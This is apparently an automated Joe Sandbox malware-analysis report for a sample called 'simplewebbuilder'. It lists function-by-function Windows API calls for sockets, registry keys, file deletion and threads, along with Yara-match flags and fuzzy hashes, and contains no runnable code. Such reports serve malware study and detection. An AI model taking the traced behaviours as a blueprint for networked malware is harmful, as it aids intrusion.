                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Sendselect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 2958345159-280543908
                                                                                                                            • Opcode ID: 71fc013ac720faa55a57bb57a9fe22590385bf7ce5b1acd99f44d7b969b246ed
                                                                                                                            • Instruction ID: 49ee2beb84bedb434ffeed162c8e2363c8cbe2fd1b9e82c6ddfcc3b85d64f003
                                                                                                                            • Opcode Fuzzy Hash: 71fc013ac720faa55a57bb57a9fe22590385bf7ce5b1acd99f44d7b969b246ed
                                                                                                                            • Instruction Fuzzy Hash: F831E370E002099FDF04DF64CA06BEEBBA9EF893A4F144959E90497281E774D9408BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2AEA
                                                                                                                            • connect.WS2_32(?,?,?), ref: 009B2AF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastconnect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 374722065-280543908
                                                                                                                            • Opcode ID: 471195ad5d96b09c8ca19ff24d8d80cb52346f869e79bdbea98ae9589b0723ef
                                                                                                                            • Instruction ID: 10a42485a8ddf2401ab3784a3c9117bdd50dd67ad628ac219a38113196871b32
                                                                                                                            • Opcode Fuzzy Hash: 471195ad5d96b09c8ca19ff24d8d80cb52346f869e79bdbea98ae9589b0723ef
                                                                                                                            • Instruction Fuzzy Hash: 5921D770E04214ABCF14EFA4C515BFEBBB9EF85330F14855DE91897281EB748A019B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CommandLineToArgvW.SHELL32 ref: 0040D869
                                                                                                                            • GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArgvCommandLineLocalTime
                                                                                                                            • String ID: XiM#
                                                                                                                            • API String ID: 561774760-2404075716
                                                                                                                            • Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
                                                                                                                            • Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: b44cf503c9a6a02115bde214402ea20193f8ff1d5de99deccdce12a8a6d72dc0
                                                                                                                            • Instruction ID: 9d6a61312b61128debbcf17588de47d25a51754fb3a60cff99a69f493231877c
                                                                                                                            • Opcode Fuzzy Hash: b44cf503c9a6a02115bde214402ea20193f8ff1d5de99deccdce12a8a6d72dc0
                                                                                                                            • Instruction Fuzzy Hash: AF513AB1904216DFCB18DF68D542BAABBA4FF48320F14C55EF8299B391D774AA10CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 009B36A7
                                                                                                                              • Part of subcall function 009B2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B2432
                                                                                                                              • Part of subcall function 009B2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B2445
                                                                                                                              • Part of subcall function 009B2420: RtlEnterCriticalSection.NTDLL(?), ref: 009B2454
                                                                                                                              • Part of subcall function 009B2420: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2469
                                                                                                                              • Part of subcall function 009B2420: RtlLeaveCriticalSection.NTDLL(?), ref: 009B2470
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1601054111-0
                                                                                                                            • Opcode ID: d48dcb2407a0e90d5dfb5a52250fbae6f306e02accbfe2175274b87d8be17981
                                                                                                                            • Instruction ID: fe3c05b283f3cd3840ea50a2fb723ff97afb3ced370b663972eb71f187087745
                                                                                                                            • Opcode Fuzzy Hash: d48dcb2407a0e90d5dfb5a52250fbae6f306e02accbfe2175274b87d8be17981
                                                                                                                            • Instruction Fuzzy Hash: 5011C1F5104209ABDF21CF54CD86FEA3B69EF40770F108416FA12862A0CB34DA609B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __beginthreadex.LIBCMT ref: 009C2706
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,009BAF7F,00000000), ref: 009C2737
                                                                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,009BAF7F,00000000), ref: 009C2745
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1685284544-0
                                                                                                                            • Opcode ID: bee2db1af203efb2e9071c01cfda4f4bb8a15050d7a239b68ad9eeb9bb0b5783
                                                                                                                            • Instruction ID: ec4360f27e5deabee85f512d334ebbf7d1e4bb4b71b2fb6db318438122808e5d
                                                                                                                            • Opcode Fuzzy Hash: bee2db1af203efb2e9071c01cfda4f4bb8a15050d7a239b68ad9eeb9bb0b5783
                                                                                                                            • Instruction Fuzzy Hash: B6F0CD74640200ABD7209FA8DCC4F92B3E8AF88324F24456EF248D7291C7B1AC829A90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3274066644-0
                                                                                                                            • Opcode ID: 209db688da663990ababfa8a3be71d832d70751f18bec2ef4f685129f17de6b3
                                                                                                                            • Instruction ID: 86b2b9efb9512c9e85355195ae1ef4b66b18e5f852848c4cf76d258d7771ada9
                                                                                                                            • Opcode Fuzzy Hash: 209db688da663990ababfa8a3be71d832d70751f18bec2ef4f685129f17de6b3
                                                                                                                            • Instruction Fuzzy Hash: 19F09034504142ABD7115B78AF365AA3BA8E7063607448279FAE6F20F2C731084ADB2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(009E82BC), ref: 009B1ABA
                                                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 009B1ACB
                                                                                                                            • InterlockedExchange.KERNEL32(009E82C0,00000000), ref: 009B1AD7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856147945-0
                                                                                                                            • Opcode ID: aaadd2db37ee9d9c59700061fad6ba60167f5d6b5097593ce58c8f8ce63ca441
                                                                                                                            • Instruction ID: 39f4dbcdd96a7d01c19792b13d0d60b5cf5dfe7793dbe64d8f0f28c75b1f8969
                                                                                                                            • Opcode Fuzzy Hash: aaadd2db37ee9d9c59700061fad6ba60167f5d6b5097593ce58c8f8ce63ca441
                                                                                                                            • Instruction Fuzzy Hash: 85D02E304AAA041BC2117BE0AC0EABA332CE701724F000202FE38C01C1EE002A0892A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009EB000.00000040.00001000.00020000.00000000.sdmp, Offset: 009EB000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9eb000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID: 1eh[
                                                                                                                            • API String ID: 4033686569-1985093824
                                                                                                                            • Opcode ID: f1dcbfb00d0c41d48b7ae3896cc46f66978d50b1edb610be155053937db11fb4
                                                                                                                            • Instruction ID: cd08071473b866bb9daa0c3009ff090e237319c21b6ebe8c2aebcbcea4ffb622
                                                                                                                            • Opcode Fuzzy Hash: f1dcbfb00d0c41d48b7ae3896cc46f66978d50b1edb610be155053937db11fb4
                                                                                                                            • Instruction Fuzzy Hash: 702130B281C6209FE711AF0CD88167ABBE9FF84714F46492EEAC887700D63558548BD7
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B4D06
                                                                                                                              • Part of subcall function 009B1BA7: __EH_prolog.LIBCMT ref: 009B1BAC
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1BBC
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1C13
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1C56
                                                                                                                              • Part of subcall function 009BE6EE: __EH_prolog.LIBCMT ref: 009BE6F3
                                                                                                                              • Part of subcall function 009BE6EE: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BE772
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 009B4E06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1927618982-0
                                                                                                                            • Opcode ID: 6d78220e98a3aadf23a71f8d7d0a7017f95701bc348d6b6f4da9f7739ad0b557
                                                                                                                            • Instruction ID: 9fc368ff934877e6b8087da340514c92cdb67f8a611830695d080564b99e7cd6
                                                                                                                            • Opcode Fuzzy Hash: 6d78220e98a3aadf23a71f8d7d0a7017f95701bc348d6b6f4da9f7739ad0b557
                                                                                                                            • Instruction Fuzzy Hash: 265106B1D04248DFDB15DFA8C985AEEBBB8BF48320F14815AE905AB352DB309A44CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2D47
                                                                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009B2D5C
                                                                                                                              • Part of subcall function 009BAAFF: WSAGetLastError.WS2_32(00000000,?,?,009B2A51), ref: 009BAB0D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282938840-0
                                                                                                                            • Opcode ID: e7983f8136c4881493e1e20370c21901bde9da8ecff1419bbc6e0451dc717914
                                                                                                                            • Instruction ID: 8e7f34f14b861435120ebc1fed66aeaab210bdaf674616b2a8ac07c5828d11db
                                                                                                                            • Opcode Fuzzy Hash: e7983f8136c4881493e1e20370c21901bde9da8ecff1419bbc6e0451dc717914
                                                                                                                            • Instruction Fuzzy Hash: D60171B5908209AFD7205F9489459BBBBECEB853A0720092EF95983241EB749D409761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: a9def0bf551afe8d5b5f8f912a45cb02ec31bcb4f94fc6bdb3a69ea8c1d69d81
                                                                                                                            • Instruction ID: 49d1aff47abafecded84190605afdff1066edc2e26bb2c2c042406fd2b805b83
                                                                                                                            • Opcode Fuzzy Hash: a9def0bf551afe8d5b5f8f912a45cb02ec31bcb4f94fc6bdb3a69ea8c1d69d81
                                                                                                                            • Instruction Fuzzy Hash: 4A015E74944301EFDF148FA0C998BA937A0BB10341F2440BF94067A1C1C7B8954EDB1A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                              • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2507506473-0
                                                                                                                            • Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
                                                                                                                            • Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: 7d91f3f71a58ca5ef36d9b339566e66e8228242bdf57f6d8db26d0650466031c
                                                                                                                            • Instruction ID: 3ba79c946bc34c5998dbd68cc4816631b79ad35567c2f08864999d5ce10e5574
                                                                                                                            • Opcode Fuzzy Hash: 7d91f3f71a58ca5ef36d9b339566e66e8228242bdf57f6d8db26d0650466031c
                                                                                                                            • Instruction Fuzzy Hash: C8E0DF75A04201EFDF045FA0CD147A93F70AB00300F24857BA906AE2C0C778D94AE719
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: dc53ccdba5527e5d2d33a22c99ccd100c3a738843860b56e70a84a83ae303bb6
                                                                                                                            • Instruction ID: 82cee3b13c60f88dc0d042c1c485f390ac59a954139c271d064072580974aa47
                                                                                                                            • Opcode Fuzzy Hash: dc53ccdba5527e5d2d33a22c99ccd100c3a738843860b56e70a84a83ae303bb6
                                                                                                                            • Instruction Fuzzy Hash: DEE0C276A00200EBDF001FB0DD587AD3F60BF14700F20853FB502B9280C7B8C44A9719
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B5232
                                                                                                                              • Part of subcall function 009B3D7E: htons.WS2_32(?), ref: 009B3DA2
                                                                                                                              • Part of subcall function 009B3D7E: htonl.WS2_32(00000000), ref: 009B3DB9
                                                                                                                              • Part of subcall function 009B3D7E: htonl.WS2_32(00000000), ref: 009B3DC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: htonl$H_prologhtons
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4039807196-0
                                                                                                                            • Opcode ID: a4e53e3ed304df738cbfdad877587925257feabbdf824a58086524e7c8c5057a
                                                                                                                            • Instruction ID: b32b12ef4bf9b55b8883469ad743b1f67cca13a41123e7bb8f46392799d70bff
                                                                                                                            • Opcode Fuzzy Hash: a4e53e3ed304df738cbfdad877587925257feabbdf824a58086524e7c8c5057a
                                                                                                                            • Instruction Fuzzy Hash: BE815C71D0424ECECF05DFA5D190AEEBBB9EF48320F20816AE815B7241E6355A46CF71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BEFBC
                                                                                                                              • Part of subcall function 009B1A01: TlsGetValue.KERNEL32 ref: 009B1A0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prologValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3700342317-0
                                                                                                                            • Opcode ID: d43e07f0d0e6018e60b7a6e7ed6f6dbd2d754ad07d372c417d39fdac5553ee95
                                                                                                                            • Instruction ID: c60522a1c34352c0c138ad2adf6d1be4d48d6bc6b0b6747be11dddaa5b655510
                                                                                                                            • Opcode Fuzzy Hash: d43e07f0d0e6018e60b7a6e7ed6f6dbd2d754ad07d372c417d39fdac5553ee95
                                                                                                                            • Instruction Fuzzy Hash: D22151B1904209AFDB10DFA4D951BFEBBF8EF48324F10812EE904E3241D771AA05DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BEB4C
                                                                                                                              • Part of subcall function 009B26DB: RtlEnterCriticalSection.NTDLL(?), ref: 009B2706
                                                                                                                              • Part of subcall function 009B26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009B272B
                                                                                                                              • Part of subcall function 009B26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D6153), ref: 009B2738
                                                                                                                              • Part of subcall function 009B26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009B2778
                                                                                                                              • Part of subcall function 009B26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009B27D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4293676635-0
                                                                                                                            • Opcode ID: 75f94db2009932880003c50973f9f48c36c7d70d2d1cf223a6f5526036f31199
                                                                                                                            • Instruction ID: ddf6db34be7baf27ddd999529f355406ff1910e4138c9a8743060fea4c0ba14e
                                                                                                                            • Opcode Fuzzy Hash: 75f94db2009932880003c50973f9f48c36c7d70d2d1cf223a6f5526036f31199
                                                                                                                            • Instruction Fuzzy Hash: D1019AB5950B049FC728DF1AC540A89FBF4EF88310B15C6AF94498B722E7B1AA40CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BE92B
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009BEB47: __EH_prolog.LIBCMT ref: 009BEB4C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4254904621-0
                                                                                                                            • Opcode ID: 1139aa016547f508eb77ccfa048664ad1917fb4ba1cc919472c2fb51aa668699
                                                                                                                            • Instruction ID: cd04cdf8abc999f65265e3a80785046110c3e37e59e5877cd696a4560abe3faf
                                                                                                                            • Opcode Fuzzy Hash: 1139aa016547f508eb77ccfa048664ad1917fb4ba1cc919472c2fb51aa668699
                                                                                                                            • Instruction Fuzzy Hash: 7AE0C271A44606ABDF0CEFA8D812BADB7A8EB84310F00866EB80AE2740EF705900C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C625A: __getptd_noexit.LIBCMT ref: 009C625B
                                                                                                                              • Part of subcall function 009C625A: __amsg_exit.LIBCMT ref: 009C6268
                                                                                                                              • Part of subcall function 009C3A93: __getptd_noexit.LIBCMT ref: 009C3A97
                                                                                                                              • Part of subcall function 009C3A93: __freeptd.LIBCMT ref: 009C3AB1
                                                                                                                              • Part of subcall function 009C3A93: RtlExitUserThread.NTDLL(?,00000000,?,009C3A73,00000000), ref: 009C3ABA
                                                                                                                            • __XcptFilter.LIBCMT ref: 009C3A7F
                                                                                                                              • Part of subcall function 009C9394: __getptd_noexit.LIBCMT ref: 009C9398
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1405322794-0
                                                                                                                            • Opcode ID: df9bdebd53230cc59a4c7a74ae3c870d7d799d4c8298179ef120df8b28ec40cf
                                                                                                                            • Instruction ID: e4e4197a3ddff3a6db0268358bc36149cb35668e0ec422738fb3e942b91688cb
                                                                                                                            • Opcode Fuzzy Hash: df9bdebd53230cc59a4c7a74ae3c870d7d799d4c8298179ef120df8b28ec40cf
                                                                                                                            • Instruction Fuzzy Hash: FAE0ECB1D047059FEB08ABA4D84EF2D7775AF84305F21408CF101AB2A2DA75AD40DB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002), ref: 0040DBEE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 5cb30d95e254f2493f2c871883abafa48a07f48bba8b5c1fe5b13ac725e6a5b6
                                                                                                                            • Instruction ID: 70df6b8cdff81a6c30c4ca399a78438459f6f472847ca99cc4bc3710177247c3
                                                                                                                            • Opcode Fuzzy Hash: 5cb30d95e254f2493f2c871883abafa48a07f48bba8b5c1fe5b13ac725e6a5b6
                                                                                                                            • Instruction Fuzzy Hash: 97A00120608501EAE2501AA25F0D7262569DB05649F22087A6A5BF6091DA79906AA92F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
